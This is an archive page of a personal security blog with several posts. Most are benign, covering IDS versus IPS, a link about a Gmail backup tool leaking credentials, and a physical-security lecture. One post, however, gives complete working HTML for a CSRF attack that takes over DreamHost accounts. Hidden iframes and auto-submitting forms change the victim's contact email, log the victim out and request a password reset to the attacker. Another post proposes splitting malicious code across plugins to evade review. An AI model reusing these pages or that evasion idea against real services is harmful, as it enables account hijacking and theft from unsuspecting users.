Security Related

Guy Mizrahi about Security and Technology.
Subscribe

Archive for the ‘Security’

IDS or IPS?

June 25, 2010 By: Guy Mizrahi Category: Security, Technology, Uncategorized No Comments →

Couple of days ago, during a lesson (There is a course in Israel called CISO and I am one of the Instructors) I talked about IDS and IPS systems.

For those of you who are not familiar with the systems:

IDS stands for Intrusion detection System and IPS stands for Intrusion Prevention System.

As you can understand from the name of the devices, they are very close one to each other.

In many cases when I does my consulting work I see an IPS device in an organizations and when I ask why did they choose and IPS system over IDS system there is no answer.

When you try to look closely you can see that the main instruction was to alert when there is an intrusion. There is no need to take action, just to alert so why would you choose an IPS over IDS? when you try to look even closer you can see that this was the recommendation from the previous consultant and no one said otherwise.

Is this a problem? Maybe. I’ll explain..

IPS is a Device that need to interfere with the network traffic. The ability to interfere will allow the attacker to identify that there is an IPS on the network because the attacker can identify the fact that some packets will not do what they was supposed to.

I think that the main problem with IDS is that you know that it is there.

If you do not need an active defense, you should consider an IDS.

It is not present on the network from the attacker point of view.

The monitor port where you can place IDS probe is completly silent and will not allow interference with the traffic.

From the attacker view there is nothing to worry about and from your place you can view all the alerts in your SIEM and instruct the SOC to react.

Another idea is that if the attacker knows about the IPS he can identify it and maybe will have a way to hurt the device itself. a 0-day for IPS.

So why use IPS? because there are places that need to respond when they are under attack. Some people will say it is most of the places.

All I am saying is don’t go to IPS because someone said it is better. You need to consider if you need the functionality of an active system by responding to an attack. If that is the case, IPS will be a good decision but otherwise? You need to think.

btw: I consider IPS that is not in the prevention mode as IDS for this article.

How to Steal DreamHost accounts?

June 14, 2008 By: Guy Mizrahi Category: Hacking, Security 6 Comments →

I thought a lot before posting this, but in the name of full disclosures..

This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.

It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).

A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..

A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).

So – How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. automatic logoff your mark from dreamhost’s control panel.

3. request a new password to the new e-mail from dreamhost.

The first page (lets call it start.php):

   1:  <html>
   2:  <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
   3:  <a1>This page can not be found</a1>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
   5:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
   6:  </iframe>
   7:  </html>

as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.

info.php:

   1:  <html>
   2:  <body>
   3:  <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
   4:  <input type=hidden name=tab value="contact">
   5:  <input type=hidden name="command" value="submit_edit">
   6:      <tr valign=top>
   7:          <td id=txt align=right><b>Name:</b></td>
   8:          <td><select name="prefix" id=frm>
   9:                  <option value=""></option>
  10:                  </select>
  11:                  <input name="first" value="somename" size="8" id=frm>
  12:                  <input name="middle" size="1" id=frm>
  13:                  <input name="last" value="somefamily" size="8" id=frm>
  14:                  <select name="suffix" id=frm>
  15:                  <option value=""></option>
  16:                  </select>
  17:          </td>
  18:      </tr>
  19:      <tr valign=top>
  20:  
  21:          <td id=txt align=right><b>Address:</b></td>
  22:          <td><input name="street1" value="somestreet" size=30 id=frm><br>
  23:                  <input name="street2" size=30 id=frm><br>
  24:                  <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
  25:  </select>
  26:          </td>
  27:      </tr>
  28:      <tr valign=top>
  29:          <td id=txt align=right><b>Email:</b></td>
  30:          <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
  31:      </tr>
  32:      <tr>
  33:          <td id=txt align=right><b>Phone:</b></td>
  34:          <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
  35:      </tr>
  36:      <tr>
  37:          <td id=txt align=right><b>Fax:</b>*</td>
  38:          <td><input name="fax" size=30 id=frm></td>
  39:      </tr>
  40:      <tr>
  41:          <td id=txt align=right><b>IM:</b>*</td>
  42:          <td><input name="chat" size=30 id=frm></td>
  43:      </tr>
  44:      <tr>
  45:          <td id=txt align=right><b>URL:</b>*</td>
  46:          <td><input name="url" size=30 id=frm></td>
  47:      </tr>
  48:      <tr>
  49:          <td></td>
  50:          <td id=txt>*optional information</td>
  51:      </tr>
  52:      <tr>
  53:          <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
  54:      </tr>
  55:  </form>
  56:  <script>
  57:  document.asd.submit();
  58:  </script>
  59:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
  60:  </body>
  61:  <html>

as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php

info3.php:

   1:  <html>
   2:  <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
   3:  </iframe>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
   5:  </html>

as you can see – info3.php is doing two things:

1. logoff your mark from dreamhost control panel

2. redirect to info2.html

info2.html:

   1:  <html>
   2:  <body onload="document.getElementById('2').submit()">
   3:  <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
   4:  <input type="hidden" name="return_url" value="" />
   5:  <input type="hidden" name="email_pwd_submitted" value="1" />
   6:  <input name="email" class="text" value="somemail@somedomain.com">
   7:  <input type="submit" class="button" value="Email me my password!">
   8:  </form>
   9:  </body>
  10:  </html>

this last step is to send a forget password notice to the new email address.

that’s it – 4 pages and you can get any dreamhost account..

G-Archiver is exposing your Gmail account details.

March 12, 2008 By: Guy Mizrahi Category: Hacking, Security No Comments →

“G-Archiver is your one click Gmail backup solution. Backup Gmail email messages”

The developer forgot to mention that G-Archiver also give him the ability to hack into your Gmail account.

read about it here:

http://www.codinghorror.com/blog/archives/001072.html

Physical Security

March 08, 2008 By: Guy Mizrahi Category: Hacking, Security 1 Comment →

Johnny from IhackStuff give a great 1 hour lecture about physical security, No Tech Hacking and Ninja way of hacking 🙂

He talks great, give a lot of stuff to think about.

You have to see this.

1 hour but worth every second.

Liquid Bomb gave me an Idea..

March 04, 2008 By: Guy Mizrahi Category: Security No Comments →

Bruce Schneier wrote a few days back about "Liquid Bomb" – something he wanted to know better about.

Mr Schneier read this article about A television documentary team said it had made a bomb by mixing a series of odourless and colourless chemicals that could be brought into an aircraft by passengers.

While everyone that read that post commented on the bombs and chemicals, I thought about plugins.

 

Why Plugins?

I think that if you’ll create plugin or add-on to any software or web site that allow it, this piece of software can be checked for malicious  code inside of it.

If you’ll write some plugins, each contains a part of a malicious code, a single function or procedure, that can work only if a user add a few more plugins – it can pass the detection procedure for problematic code (If there is one).

A single function that is hiding in a few hundred lines of code is not so simple to detect.

 

So let’s say you’ll create a series of plugins for wordpress or maybe some facebook applications and you’ll cut your malicious code to separate functions and distribute this – There can be a way to create an attack using this distributed code.

 

Yes, we don’t have bottles and liquid here but it looks the same to me..


Bad Behavior has blocked 143 access attempts in the last 7 days.

FireStats icon Powered by FireStats